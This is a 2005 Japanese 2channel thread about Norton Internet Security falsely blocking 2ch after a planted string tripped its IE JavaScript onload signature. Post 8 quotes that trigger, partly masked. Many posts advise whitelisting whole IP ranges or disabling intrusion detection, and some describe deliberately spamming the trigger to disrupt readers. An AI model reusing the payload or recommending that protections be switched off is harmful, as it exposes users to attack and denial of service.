X
トップページ運用情報
981コメント274KB
ノートン誤作動対策本部
レス数が950を超えています。1000を超えると書き込みができなくなります。
0001動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:08:40ID:bR9gbCGm0
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
0003動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:15:57ID:bR9gbCGm0
1. [侵入検知]をダブルクリック
2. [AutoBlock]をクリック
3. 〔除外〕をクリック
4.右にある除外したコンピュータの[追加]をクリック
5. [範囲を使う]をチェック
5. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.226.154.255」してOKをクリック
0004動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:18:13ID:UFsoIQqD0
何にノートンは反応してるわけ?
0005動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:19:31ID:7bX9hHG50
>>1

まあここに書いても
ここも反応して見れなかったからあんまり意味ないかもね
0008 [―{}@{}@{}-] 動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:25:38ID:Xl0qltyW0
>>4
<body onload=w****w()>
らしい。一応伏せておく
0009動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:26:59ID:3q4IcjBy0
ノートンを使わない これ最強
0010動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:27:56ID:UFsoIQqD0
>>7
いや具体的に聞きたかったんじゃないのよ
なんか貼られてるから反応してんのね?

鯖側のせいでないことだけ確認したかったのです。
でないと怖くて信頼ゾーンなんか設定できない。
0011動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:30:43ID:bR9gbCGm0
ERROR:referer情報が変です。(ref1)
書き込もうとすると↑が表示されて書き込めないのはなぜ?
回避方法きぼん。
0012動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:31:34ID:q0xhRg0i0
2chサーバの全IP

206.223.147.0-206.226.154.255

ってこれでいいの?
0013動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:35:39ID:Gob5/eqM0
1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック
0015動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:40:44ID:IOJ0BKwm0
VIPみれねええええええぇぇぇぇぇぇぇぇぇwwwwwwwwww
0018動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:53:58ID:YPTd5/S60
あったなあ、そんな厨臭いFW
0023動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 17:49:44ID:P3OAKiHs0
>>14
これやったけど、運用情報だけはNISきらないとみれない
0024動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 18:13:12ID:E5jIz+wH0
つまりノートンは使うなという警告ですか。そうですか・・・
0025動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 18:14:15ID:cVb7NJha0
↓スレスト
0027動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 18:23:34ID:vEq4MwVH0
自己責任論再燃か?
0028動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 18:28:48ID:l4yE4UX20
脆弱性うんぬんはおいといてさ
実際に悪さをするスクリプトな訳でもないただの文字列に
「誤反応」してるだけでしょ?
だったら、loveletterウイルスのソースと同じじゃん。
結論:脳豚氏ね
0029動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 18:29:50ID:EoT3dibj0
598 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/11/27(日) 18:15:04
とりあえず、侵入阻止→拡張→HTTP MSIE javaScript OnLoad Rte CodeExecの
チェックを外すと出なくなるけど、
阻止してもらいたいときに切ってしまっているのはマズい気ガス

948 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/11/28(月) 18:18:55
>>898
2005なら >>598
2004だと、侵入阻止→設定→詳細→HTTP MSIE javaScript OnLoad Rte CodeExec
を除外
0030 ◆BOX/05....
垢版 |
NGNG
最善策:ノートンアンインスコ
0032動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 18:36:51ID:hPlrmmBO0
世界中のフォーラム、ブログに例のキーワード貼りまくれば
シマンテックに苦情がいくと聞いたんですが本当ですか?
0036動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 18:59:34ID:2gW9Pj+W0
ノトンうぜーーーーーーーーー
どうすればいいのよ
0037動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 19:01:05ID:Czo7H8Ry0
バスターも4月に前科あるからな。
アップデートするとCPU使用率が100%になるっつーウィルスばら撒いたし。
もう何を信じりゃ良いのか
0039動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 19:03:30ID:XbjYzl3H0
>>37
あんときゃノートン先生でよかったとつくづく思ったもんだ

('A`)ホントにどうしよ。
0041 ◆BOX/05....
垢版 |
NGNG
>>37
俺にとってはかえってうれしかったぞ。
1ヶ月サポ期間延長したし、
0042動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 19:19:23ID:nv3YOitT0
てす
0043動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 19:22:19ID:IEwXQMy10
ノートンの進入検知を殺すと見れた。
>>40みたいに、ルーターを信じてみます。。。。
0044動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 19:22:41ID:h7K4WcS/0
てすと
0047動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 19:27:11ID:KEq5OaRO0
次のOSに期待する・・・
0049動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 19:32:56ID:5b/RdSwI0
@Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload=[Tab]onload=
みたいに置き換えればOK(↑の”[Tab]”はタブ入力)
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ

これってガセなの?
0053 ◆BOX/05....
垢版 |
NGNG
WindowsVistaいつー?
0059動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 21:33:49ID:VLgTJOGf0
MSがIE脆弱性の対策を実行後
NISの侵入検知の設定から
HTTP MSIE JavaScript OnLoad Rte CodeExec
を除外すれば問題は解決するのでは?

0062 ◆BOX/05....
垢版 |
NGNG
IEが玄人に嫌われてる理由が改めて再認識。。
0072動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 22:22:52ID:3W3Re7YA0
>>71
侵入検地→AutoBlock→現在AutoBlockで遮断してあるコンピュータ
の欄に2chのアドレスがあれば解除。30分で自動でなくなるけど。
007470
垢版 |
2005/11/28(月) 22:29:35ID:/ImKa0uc0
スマン早とちりした
398と500だな
2回も>>8これ貼ってやがる

で、侵入検地→AutoBlock→除外→削除して
ノートン解除してスレ読み込んで該当レスを透明あぼ〜んで解決できました
0075動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 22:44:09ID:JgXJzu1N0
1. [ファイアウォール]をダブルクリック
2. [ネットワーク]をクリック
3. [信頼]をクリック
4. [追加]をクリック
5. [範囲を使う]をチェック
6. 開始アドレスに「206.223.147.0」を入力、終了アドレスに「206.223.154.255」してOKをクリック

たまにこういうのがあるけど、こういうことやって何が楽しんだろうといつも思う。
0079動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 22:57:14ID:JgXJzu1N0
ああ、言葉足らずでゴメンナサイ
上のは解決法で下の言葉は誤作動させる文字列についてのコメント。
てか、上の貼り付けた意味ないしスマンカッタorz
0083動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 23:36:26ID:dNiMHICl0
>>79
確信犯めw
0085動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 23:39:50ID:z708/Phl0
かくしんはん【確信犯】

道徳的・宗教的・政治的な信念に基づき、自らの行為を正しいと信じてなされる犯罪。
思想犯・政治犯・国事犯など。

三省堂提供「大辞林 第二版」より
0087動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 23:52:30ID:it50771z0
ノートンはアンチウイルスだけでいいじゃん。
ノートン インターネットセキュリティなんて不要。
ノートンはウイルスが専門。
インターネットとか専門外。
アンチウイルスがよくできてるからって、何でもかんでもノートンに頼ろうとするのがおかしい。
ネットセキュリティはそれ専用のもっとイイの使えばいいじゃん。
おれノートンシステムワークだけどなんの問題もないよ。
0089 [―{}@{}@{}-] モーホー犯
垢版 |
2005/11/28(月) 23:57:57ID:tzhurvMZ0
            , '´  ̄ ̄ ` 、 
          i r-ー-┬-‐、i 
           | |,,_   _,{| 
          N| "゚'` {"゚`lリ     や ら な い か 
             ト.i   ,__''_  ! 
          /i/ l\ ー .イ|、 
    ,.、-  ̄/  | l   ̄ / | |` ┬-、 
    /  ヽ. /    ト-` 、ノ- |  l  l  ヽ. 
  /    ∨     l   |!  |   `> |  i 
  /     |`二^>  l.  |  | <__,|  | 
_|      |.|-<    \ i / ,イ____!/ \ 
  .|     {.|  ` - 、 ,.---ァ^! |    | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄l 
__{   ___|└―ー/  ̄´ |ヽ |___ノ____________| 
  }/ -= ヽ__ - 'ヽ   -‐ ,r'゙   l                  | 
__f゙// ̄ ̄     _ -'     |_____ ,. -  ̄ \____| 
  | |  -  ̄   /   |     _ | ̄ ̄ ̄ ̄ /       \  ̄| 
___`\ __ /    _l - ̄  l___ /   , /     ヽi___.| 
 ̄ ̄ ̄    |    _ 二 =〒  ̄  } ̄ /     l |      ! ̄ ̄| 
_______l       -ヾ ̄  l/         l|       |___| 
0090動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 00:06:01ID:GOS6cDIa0
先生の過保護は信頼面もカバーした上ならいいんだが
現状のFWに関する被害とか調べるとやっぱ誤作動としか呼べんもんなのなかね
アドバンテージが万が一多少あっても、弊害によるリスク大きすぎ
情報集めるのに2chみれないのは痛い
0091動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 00:27:17ID:aaYc1isI0
>>13
を設定したら使えるようになったんだけど
これって要するに
にちゃんの鯖からアタックきてもヌルーするぜ!って設定と考えてok?
0101動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 01:54:06ID:XmFaLipY0
ノートンのオートプロテクトを無効にしてると、反応しないの?
0102動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 02:12:19ID:CSqHdTd20
とりあえず
ノートンインターネットセキュリティーをアンインストールして
ノートンアンチウイルスは残して
ZoneAlarmとかゆうのでもインストールしとけばいいのかな?
0104動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 02:21:38ID:IeAd5xNRO
スレスト
0108動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 04:05:28ID:8mpdBXGL0
>>107

ニ|ニ       , -─- 、   \
o‐、     /      ヽ   ) 2chのIP除外して
‐ヽ‐      l .....   ....   !   ( 攻撃されたらどうしようって?
(こ     rj. ,ィぇ  rぇ、  lォ   }
l −     `l  / ー ヽ  l′ ノ/⌒て_
| ー   __,人. {ゝニ.フ } /ヽ_       `ー
/7.|  r/ j_\、_ィ/ノ 8 o sヽ \ー'⌒ヽ-
7 ト_/ j       O⊂¬‐ 、d 9 l  ノ だったら2chから
ヽxyトミ}|          l{三 ノ \<>| (  引退すれば万事解決だぜ!
ス且ー'|           |ー 'ヽ    ̄) )
0110動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 07:42:45ID:obfy6OkR0
ブロードバンドルーターがあれば、ファイアーウォールの設定など
少々甘くしても大丈夫なんじゃないかって気はするが。
0113動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 08:48:19ID:2zLuZQ/q0
なんでスレストされないの?
0114動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 08:54:51ID:ZTwj2kSU0
ノートン作動したら、この板見れなくなったよ
ここに対策スレ立てても意味無いから!
0122動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 12:45:10ID:2iyMfwEH0
ノートン2003の場合は、こっちも必要では?

質問・雑談スレ208@運用情報板
http://qb5.2ch.net/test/read.cgi/operate/1132976990/250
250 動け動けウゴウゴ2ちゃんねる sage 2005/11/28(月) 16:02:49 ID:sD89a3L50
でも今になって出てくるんだからセキュリティホールって言うものは恐ろしい

>>235のを適用する方法を書きます。
ノートン2003の場合

1. [侵入検知]をダブルクリック
2. [IPアドレス]をクリック
3. 右にある除外したコンピュータの[追加]をクリック
4. [範囲を使う]をチェック
5. アドレスに「206.223.147.0-206.226.154.255」を入力してOK
0123動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 12:47:55ID:JZL21HVx0
とりあえず、オミトロンのフィルタ。
即席だし、ノートン入れて無いから使えるか分からんけど。

[Patterns]
Name = "Kill NortonTrap2"
Active = TRUE
URL = "[^/]++.2ch.net/"
Limit = 256
Match = "onload="
Replace = "notload"
0124動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 12:48:40ID:x2/YUPqr0
使ってないから知らないんだけど、PFWだけアンインストール出来ないのかい?
出来るなら、アンインストールして、フリーの適当なやつを使うのが一番じゃないかと思う。
0125動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 12:53:19ID:UNm/pA9n0
>>124
NAVとPFWを別に導入してるならともかく、NISではPFWだけアンインスコはたぶん無理だったかと。

もちろん、PFWをオフにして、別のFWを使う手はアリだけど。

0127動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 12:59:52ID:2iyMfwEH0
終了アドレスが

>>122だと  206.226.154.255
           ^^^^
>>13だと   206.223.154.255
           ^^^^
だけど、どっちが正しいんだろう。開始アドレスはどっちも同じだけど。

>>126
コピペしただけなので分かりません、すみません。
0129動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 13:40:48ID:Uit2EyL90
>>13 今やったけどほんとにこれを信用していいのか?

運営側の公式な対策の発表を求めます。
0131動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 13:57:15ID:64Yve/u40
>>3やったら見れる様になったけど、これって何かまずいの?
0133動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:10:45ID:jbErmE7Q0
>>127
>>3>>122の226はコピペミスだと思う。>>13,14がたぶん正解。
下の鯖監視係で確認できる。あとイレギュラーなのはbeとsports2
be.2ch.net (202.222.31.214)
sports2.2ch.net (210.224.161.33)

使う鯖のIPアドレスを個別に指定したほうが安全だと思うし、
個人的にも安心する。

2ch 鯖監視係。
http://sv2ch.baila6.jp/sv2ch01.html
0137動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:38:13ID:58QXXjI60
0138動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:38:33ID:HN4zcZyS0
TUBO
0139動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:38:48ID:dAnayUdk0
0141動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:40:14ID:pO11347s0
ぼつ
0142動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:40:30ID:Q+pwb/zX0
ちゅぼん
0143動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
つぼ
0144動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:41:42ID:q2fVmiiF0
ツボ
0145動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:42:05ID:V84A/5KC0
ウィルスバスター越しに壷カキコ
0146動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:42:06ID:6cFmQKPS0
壷うぜえええええええええええええええええええええええええええええええええええええええええ
0147(ё)ぎゃわゎ ◆1/3.GW370.
垢版 |
NGNG
つぼった
0148動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:43:14ID:N03IfZmO0
tubo
0149動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:43:30ID:x4bxgnO+0
壷記念ぱぴこ
0150動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:44:16ID:vFFFIInt0
バスター最高
つぼ
0151動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:44:23ID:09U0zSRv0
つぼんぬ
0152動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:44:54ID:6ZUDY+9a0
つぼ
0153動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:45:28ID:vFFFIInt0
バスター最高
つぼ
0156動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:47:06ID:5opENHAy0
少なくとも今回の壷は役に立っていると思う。
まだ知らない人もいるかもしれないしね。
0157動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:47:07ID:iekpw/F10
0158動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:52:38ID:pO11347s0
ぼつ
0159動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:55:51ID:RB8/SHVL0
ナイス壺
0160動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:56:11ID:gvcrll0r0
侵入検知を無効にした
NIS2003 WinXP
0163動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 14:58:51ID:cAmLLi0Y0
tubo-!
0164動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 15:01:03ID:XD4qVywj0
0167動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 15:22:09ID:8mpdBXGL0
>>129

http://qb5.2ch.net/test/read.cgi/operate/1132976990/

442 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/29(火) 15:01:54 ID:eTCs9aYs0
>運営の人
ノートン誤作動の件なんだけど明らかに狙って書き込みしてるんだから
特定文字列を書き込みしようとした人を強制バーボンとかしてもいいんじゃないの?

448 名前: ◆SSu.zv/rvs 投稿日:2005/11/29(火) 15:14:32 ID:zBqE3jpw0
淘汰されなきゃね、
生き残りを手伝う気はさらさらないっす

449 名前: ◆MUMUMUhnYI 投稿日:2005/11/29(火) 15:18:01 ID:VEIDKG1+0
そんな迷惑なソフトなんて、自然にまかせてなくなるべきだって、
おじさんはゆうだろうな。

私も、そう思っていたり。

◆SSu.zv/rvs=FOX ★ ◆MUMUMUhnYI =root ★
0169動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 15:24:29ID:gvcrll0r0
色々調べたら俺の使ってるjaneDoeViewでリプレイス出来るみたいだな
これでいいや
0170動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 15:26:41ID:ZQLMHwKg0
壺真紀子
0171動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 15:30:40ID:gVJ+U4Sf0
>>169
まあせいぜいがんばりや
0172動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 15:31:14ID:luR6ZtU30
壷亮子
0173動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 15:35:22ID:YxCZ2tCu0
ツ本
0174動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 15:36:03ID:gvcrll0r0
>>171
おう!
0179眼薬。 ◆EYES05959.
垢版 |
NGNG
|,゚д゚)・・・・・ ツボ。それ以前に
僕のノートン先生はぶっ壊れてるからある意味無意味。

現在の情報が更新中から更新されないし。。。
項目クリックするとページが表示出来ませんって言われるし。。。
0180時計坂の削除屋 ★
垢版 |
2005/11/29(火) 15:53:48ID:???0
攻撃を遮断しましたって出るけど
ふつうに2ch見れますよ。
0181動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 15:58:13ID:gVJ+U4Sf0
>>180
遮断されたんなら普通じゃないだろ
0183sage
垢版 |
2005/11/29(火) 16:02:17ID:ndHSVD8q0
壷。
うちはマカフィーだからカンケー無い
0184動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 16:03:53ID:IfvCPHxz0
知らんがなつぼ
0185動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 16:06:20ID:PJws21uA0
13と14でいいんだな
これって見れないときにいちいちやんなきゃいけないの?
それとも一度やっとけばいいの?
0187動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 16:24:43ID:tl2CRrIr0
tubo
0188動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 16:27:01ID:NLpGLhEQ0
壺UEEEEEEEEEEEEeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
0191動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 17:09:00ID:sHz0qPv10
つぼーん
0194動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 17:34:45ID:OMmBdrYj0
tubo
0196動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 17:50:46ID:uUpJGZO80
壷からきたよ〜ん”!
0197動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
壷からきました
0198ノtasukeruyo
垢版 |
2005/11/29(火) 18:01:08ID:fydB23Uw0
壺から来ました!!!
Monazilla/1.00 Live2ch/1.12
0203動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 18:40:28ID:gVJ+U4Sf0
つぼつぼうるせー
0204動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 18:44:12ID:mMzPXlX/0
>>13を実行すると2ちゃんに対して限りなく無防備になる・・!
これはひろゆきの陰謀・・2ちゃんIP除外さsghbfxg@ふじお」
0205動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 18:49:00ID:5TYjJKDv0
それでも壷
何かと引っかかってくるノートンなんぞ使うなYO!
0207動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 18:53:58ID:5TYjJKDv0
WIN95時代にノートン製品使って痛い目見てから俺はここのソフトは使ってない。
0208動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 18:56:22ID:4RalRQzW0
>>206
たぶん遮断されたままになってる
侵入検知の設定で消せ



VIP臭いとかいわれて●ログインなしで書き込めない・・・
0210動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 19:00:40ID:gVJ+U4Sf0
>>209
それFWじゃないとか
0215動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 19:12:49ID:nvItxBk10

俺マカ使い
021994
垢版 |
2005/11/29(火) 19:28:23ID:zOkoTgfL0

亀だけど礼を言いたいのは>>96に対してですた
0221動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 19:31:17ID:nnXxkQxK0
>>213
検知とファイアーウォール両方いじったら直ったよ
0222動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 19:37:13ID:6GYxmvRu0
俺の場合(2005)はFWだけ弄れば見たい板は問題なく見れるようになった。
範囲でFW通すのは何やら精神的に気持悪いから、個別で指定してる。まぁそれでもいい気はしないがね・・。
0223動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 19:40:54ID:9JoMVshG0
心配なら取得する時のみ無効にすればいい。侵入検知を切るだけでおk
0224動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 19:43:03ID:aP9Wz7KR0
侵入検知はオートプロテクトを切ると切れるんですか?
0228動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 19:59:24ID:Q+gfjjfY0
ノートン<<<<<<<<<ウイルス警備隊
0230動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 20:07:13ID:nI/Sl6mU0
壷さんからお呼びがかかりました。
ウイルス警備隊ユーザーには関係ないぽね
0233動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 20:10:27ID:JMwS8yeh0
昨日何とも無かったのに今日になったら誤作動したよ
めんどくせえなぁ
0234動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 20:29:16ID:6u6YhnaM0
tubo

0240動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 21:00:43ID:ADUf7TYV0
キングソフトのインターネットセキュリティーが今なら無料だから入れてみようかなぁ?
中国製だけどソースネクストのよりは良い?
0246stream ◆PNstream2s
垢版 |
2005/11/29(火) 21:21:19ID:o3YHdNzt0
>>244
再インスコのつもりがアンインスコ
0248動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 21:28:31ID:Afo9w9Uo0
何この流れ
0255動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/29(火) 22:14:54ID:FOzVTJ020
あー。コレか原因は。
LiveUpdateで勝手に入ったから突然変になった様に感じた訳か。

このまま何の対策も無かったら次の期限でオサラバするか。
とりあえず今の所は進入検知切ってログ取得。

IPを除外リストに入れても、例の文字列書いてあるスレの
ログ取得するとログがメチャメチャだし。
0258動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 00:02:26ID:Ckl+Jhr20
これって2ch側は何も対策しないの?
0259動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 00:05:41ID:eYxFM4Ga0
>>257
NISで?
0261動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 00:09:45ID:su3dAoZP0
>>258
悪いのはこんな糞な仕様なソフト作ってるシマンティックだし

>>167
の通り、2ch側で対応するべき問題じゃない。
この問題を対応するのはシマンテック側だろ。
ま、シマンテックは今までに報告されてる誤作動も修正したことないし今回もスルーだろう
自分で>>13とかの応急処置をするしか方法はないかと

今回ので俺はノートンからさよならした
0262動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 00:14:08ID:qToWCUMM0
ギコナビみれるようになったけど、行間ができてるみたいなんだけど
これって直らないの?
AAとかがみにくい・・・
0268動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 00:38:36ID:HACQJiVy0
ノートンの侵入検知切ったら見れるようになったけど
この侵入検知って切ると何がヤバイの?
何が侵入してくる?
0272動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 01:24:10ID:tkppn4ZU0
>>270
私の名は喪黒福造
人呼んで笑うセールスマン
セールスマンと言っても、ただのセールスマンでは御座いません。
私の取り扱う品物は「心」人間の心で御座います。
この世は老いも若きも男も女も、心の寂しい人ばかり。
そんな皆様の心の隙間を、お埋め致します。いいえ、お代は一銭もいただきません。
お客様が満足していただけたら、それが何よりの報酬でございます。
さて、今日のお客様は……
ほぉ〜ほっほっほっ
0281動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 03:37:37ID:yDPhDj6Y0
なんか例の対策は自己責任とか出るしとってもやりにきんだけど
なんか対策してないのにこのスレ読み込めるようになったのは
2ch様が対策してくれたのですか?bodyなんちゃらをNGワードにしても
意味ないらしいし…なんでこのスレみれるようになったんでしょうか
0282動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 03:52:08ID:JLudtcP90
296 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 17:58:55 ID:Ejg9D+rr0
何も対策してないのに、少し前から急に見られるようになった。

297 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 18:00:38 ID:7P7mflxJ0
30分経過しただけじゃね?

299 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 18:05:08 ID:M2vw8U+r0
>>296
自分も。
なぜだろう。

303 名前:動け動けウゴウゴ2ちゃんねる 投稿日:2005/11/28(月) 18:18:00 ID:WmGEF4hJP
>>299
詳細: 侵入を検出して遮断しました。
news19.2ch.net(206.223.151.67)
とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
0283動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 04:19:21ID:yDPhDj6Y0
30分我慢すればいいのか。
こういう悪いことは一体誰がどういう経緯で気づくんだろうか。
ウィルスコードで誤反応とか解決できたと思ったら、すぐまた新しい手段でくるし
大宮寺 あゆ親衛隊みたいのがまた真似して貼りまくるんじゃないのか・・・
今度はその鯖自体読み込めなくなるのって凶悪すぎるよ・・・。
こんなの実況中に貼りまくられたら、「スレが見えなくなったんだけど?」みたいな
そういうレスばっかになって台無しだよ。専ブラのNG指定でも効果ないなんて

安心していいんですか?
対策施して、これ考えた人がそれすらも予想していて
対策した人になんか攻撃してくる方法編み出してたらどうすればいいの?
206.223.147.0-206.223.154.255、
除外しない方がいいんですか?全ては自己責任とか書いてるし
なんか不安材料ありますみたいな書き方だし。キンタマウィルス流し込まれたり
山田ウィルス流し込まれたりされませんか?
ウィルスコードの文字列とかは、ログ除外しても「文字コードだけでどうやって感染するんだw」
みたいな説得力あるお言葉があったからいいけど・・・。今度のは・・・?
0284動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 04:27:49ID:l9aDfmuR0
山田もキンタマも>>283がすでにそれらに感染してないと
どうもならないよ ながしこんで自動感染させる事が出来たら
P2Pとかつないだ瞬間感染しちゃう
0285動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/30(水) 04:37:51ID:l9aDfmuR0
山田とかキンタマは○○.exeって感じの実行形式ファイルだから
これらをどっかから手に入れて、実行して感染して、さらに
>>283がファイアーウォールの206.223.147.0-206.223.154.255を除外したら、
ひろゆきに、ごにょごにょされる可能性があるっちゃある
0288動け動けウゴウゴ2ちゃんねる
垢版 |
